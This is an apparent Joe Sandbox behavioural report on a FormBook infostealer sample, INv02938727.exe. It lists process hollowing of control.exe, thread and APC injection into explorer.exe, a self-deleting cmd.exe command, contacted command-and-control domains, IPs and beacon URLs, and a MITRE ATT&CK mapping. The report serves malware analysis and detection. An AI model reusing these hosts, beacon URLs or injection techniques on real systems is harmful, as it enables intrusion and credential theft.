            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DC002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DC002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E64015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E64015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E17016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E17016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E17016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E241E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04D9B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04D9B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04D9B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E169A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DC2990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DBC182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DCA185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E151BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E151BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E151BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E151BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DC61A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DC61A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DBB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DBB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04D9B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04D9B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04D9C962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04D99100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04D99100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04D99100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DC513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DC513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DB4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DB4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DB4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DB4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DB4120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DC2ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DC2AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DCD294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DCD294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DAAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DAAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DCFAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04D952A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04D952A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04D952A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04D952A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04D952A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E4B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E4B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E68A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04D99240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04D99240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04D99240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04D99240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DD927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\control.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\INv02938727.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.sequenceanalytica.com
            Source: C:\Windows\explorer.exeNetwork Connect: 107.165.40.251 80
            Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80
            Source: C:\Windows\explorer.exeDomain query: www.manifestarz.com
            Source: C:\Windows\explorer.exeDomain query: www.funtimespheres.com
            Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
            Maps a DLL or memory area into another processShow sources
            Source: C:\Users\user\Desktop\INv02938727.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\INv02938727.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\INv02938727.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\INv02938727.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\INv02938727.exeThread register set: target process: 3292
            Source: C:\Users\user\Desktop\INv02938727.exeThread register set: target process: 3292
            Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 3292
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\INv02938727.exeThread APC queued: target process: C:\Windows\explorer.exe
            Sample uses process hollowing techniqueShow sources
            Source: C:\Users\user\Desktop\INv02938727.exeSection unmapped: C:\Windows\SysWOW64\control.exe base address: B90000
            Source: C:\Users\user\Desktop\INv02938727.exeProcess created: C:\Users\user\Desktop\INv02938727.exe C:\Users\user\Desktop\INv02938727.exe
            Source: C:\Users\user\Desktop\INv02938727.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
            Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\INv02938727.exe'
            Source: explorer.exe, 00000003.00000002.511763948.0000000001400000.00000002.00000001.sdmp, control.exe, 0000000F.00000002.511612749.0000000003620000.00000002.00000001.sdmpBinary or memory string: uProgram Manager
            Source: explorer.exe, 00000003.00000002.511763948.0000000001400000.00000002.00000001.sdmp, control.exe, 0000000F.00000002.511612749.0000000003620000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000003.00000002.511763948.0000000001400000.00000002.00000001.sdmp, control.exe, 0000000F.00000002.511612749.0000000003620000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000003.00000002.511763948.0000000001400000.00000002.00000001.sdmp, control.exe, 0000000F.00000002.511612749.0000000003620000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 00000003.00000002.510673235.0000000000EB8000.00000004.00000020.sdmpBinary or memory string: ProgmanX
            Source: explorer.exe, 00000003.00000000.276768053.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndAj
            Source: C:\Users\user\Desktop\INv02938727.exeQueries volume information: C:\Users\user\Desktop\INv02938727.exe VolumeInformation
            Source: C:\Users\user\Desktop\INv02938727.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\INv02938727.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\INv02938727.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\INv02938727.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\INv02938727.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
            Source: C:\Users\user\Desktop\INv02938727.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 0000000F.00000002.511352331.0000000003250000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.319119238.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.318875826.0000000001590000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.250754758.00000000036D9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.512153616.0000000004B30000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 2.2.INv02938727.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.INv02938727.exe.400000.0.raw.unpack, type: UNPACKEDPE

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 0000000F.00000002.511352331.0000000003250000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.319119238.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.318875826.0000000001590000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.250754758.00000000036D9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.512153616.0000000004B30000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 2.2.INv02938727.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.INv02938727.exe.400000.0.raw.unpack, type: UNPACKEDPE

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsShared Modules1Path InterceptionProcess Injection512Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1Input Capture1Process Discovery2Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection512LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing3Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 411836 Sample: INv02938727.exe Startdate: 12/05/2021 Architecture: WINDOWS Score: 100 44 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->44 46 Found malware configuration 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 7 other signatures 2->50 9 INv02938727.exe 3 2->9         started        process3 file4 28 C:\Users\user\AppData\...\INv02938727.exe.log, ASCII 9->28 dropped 52 Tries to detect virtualization through RDTSC time measurements 9->52 13 INv02938727.exe 9->13         started        signatures5 process6 signatures7 54 Modifies the context of a thread in another process (thread injection) 13->54 56 Maps a DLL or memory area into another process 13->56 58 Sample uses process hollowing technique 13->58 60 Queues an APC in another process (thread injection) 13->60 16 control.exe 13->16         started        19 explorer.exe 13->19 injected process8 dnsIp9 36 Modifies the context of a thread in another process (thread injection) 16->36 38 Maps a DLL or memory area into another process 16->38 40 Tries to detect virtualization through RDTSC time measurements 16->40 22 cmd.exe 1 16->22         started        30 www.funtimespheres.com 107.165.40.251, 49732, 80 EGIHOSTINGUS United States 19->30 32 sequenceanalytica.com 184.168.131.241, 49733, 80 AS-26496-GO-DADDY-COM-LLCUS United States 19->32 34 3 other IPs or domains 19->34 42 System process connects to network (likely due to code injection or exploit) 19->42 24 autochk.exe 19->24         started        signatures10 process11 process12 26 conhost.exe 22->26         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            INv02938727.exe61%VirustotalBrowse
            INv02938727.exe38%MetadefenderBrowse
            INv02938727.exe69%ReversingLabsByteCode-MSIL.Trojan.Taskun
            INv02938727.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            2.2.INv02938727.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

            Domains

            SourceDetectionScannerLabelLink
            www.funtimespheres.com0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.sequenceanalytica.com/kkt/?n8=WT801LO0&ItLd=beAPPUpQq3bTf0wVpdVGLtZQUj/Y58U/IZEW6sslvUZTyjBteEnfLFfdWI9VdBzisWFD4iTcDg==0%Avira URL Cloudsafe
            http://www.funtimespheres.com/kkt/?ItLd=mESCp8fUWMf2GiNccZQr41WoLlunmDO2dTTww9D/7e3BTia5ZniOyGA6Z4qikYh0oIJWnb//TQ==&n8=WT801LO00%Avira URL Cloudsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://mindcart.ai/kkt/?n8=WT801LO0&ItLd=beAPPUpQq3bTf0wVpdVGLtZQUj/Y58U/IZEW6sslvUZTyjBteEnfLFfdWI90%Avira URL Cloudsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            www.hometowncashbuyersgroup.com/kkt/0%Avira URL Cloudsafe
            http://www.manifestarz.com/kkt/?n8=WT801LO0&ItLd=YJq3LfF57r8Qfq7uTCgZxOPP1vMH1/e9D5ir0WlXFDknegtt717KVO1lFmJGJc9BoYXzy139hQ==0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.funtimespheres.com
            107.165.40.251
            truetrueunknown
            manifestarz.com
            34.102.136.180
            truefalse
              unknown
              sequenceanalytica.com
              184.168.131.241
              truetrue
                unknown
                www.sequenceanalytica.com
                unknown
                unknowntrue
                  unknown
                  www.manifestarz.com
                  unknown
                  unknowntrue
                    unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.sequenceanalytica.com/kkt/?n8=WT801LO0&ItLd=beAPPUpQq3bTf0wVpdVGLtZQUj/Y58U/IZEW6sslvUZTyjBteEnfLFfdWI9VdBzisWFD4iTcDg==true
                    • Avira URL Cloud: safe
                    unknown
                    http://www.funtimespheres.com/kkt/?ItLd=mESCp8fUWMf2GiNccZQr41WoLlunmDO2dTTww9D/7e3BTia5ZniOyGA6Z4qikYh0oIJWnb//TQ==&n8=WT801LO0true
                    • Avira URL Cloud: safe
                    unknown
                    www.hometowncashbuyersgroup.com/kkt/true
                    • Avira URL Cloud: safe
                    low
                    http://www.manifestarz.com/kkt/?n8=WT801LO0&ItLd=YJq3LfF57r8Qfq7uTCgZxOPP1vMH1/e9D5ir0WlXFDknegtt717KVO1lFmJGJc9BoYXzy139hQ==false
                    • Avira URL Cloud: safe
                    unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000003.00000000.269026840.0000000006870000.00000004.00000001.sdmpfalse
                      high
                      http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpfalse
                        high
                        http://www.fontbureau.comexplorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpfalse
                          high
                          http://www.fontbureau.com/designersGexplorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpfalse
                            high
                            http://www.fontbureau.com/designers/?explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpfalse
                              high
                              http://www.founder.com.cn/cn/bTheexplorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.com/designers?explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpfalse
                                high
                                http://www.tiro.comexplorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.com/designersexplorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpfalse
                                  high
                                  http://www.goodfont.co.krexplorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssINv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmpfalse
                                    high
                                    http://mindcart.ai/kkt/?n8=WT801LO0&ItLd=beAPPUpQq3bTf0wVpdVGLtZQUj/Y58U/IZEW6sslvUZTyjBteEnfLFfdWI9control.exe, 0000000F.00000002.515402628.000000000578F000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.carterandcone.comlexplorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.sajatypeworks.comexplorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.typography.netDexplorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.founder.com.cn/cn/cTheexplorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://fontfabrik.comexplorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.founder.com.cn/cnexplorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.jiyu-kobo.co.jp/explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.com/designers8explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpfalse
                                          high
                                          http://www.fonts.comexplorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpfalse
                                            high
                                            http://www.sandoll.co.krexplorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.urwpp.deDPleaseexplorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.zhongyicts.com.cnexplorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameINv02938727.exe, 00000001.00000002.250096553.00000000026D1000.00000004.00000001.sdmpfalse
                                              high
                                              http://www.sakkal.comexplorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              107.165.40.251
                                              www.funtimespheres.comUnited States
                                              18779EGIHOSTINGUStrue
                                              34.102.136.180
                                              manifestarz.comUnited States
                                              15169GOOGLEUSfalse
                                              184.168.131.241
                                              sequenceanalytica.comUnited States
                                              26496AS-26496-GO-DADDY-COM-LLCUStrue

                                              General Information

                                              Joe Sandbox Version:32.0.0 Black Diamond
                                              Analysis ID:411836
                                              Start date:12.05.2021
                                              Start time:07:30:24
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 10m 45s
                                              Hypervisor based Inspection enabled:false
                                              Report type:light
                                              Sample file name:INv02938727.exe
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Number of analysed new started processes analysed:27
                                              Number of new started drivers analysed:0
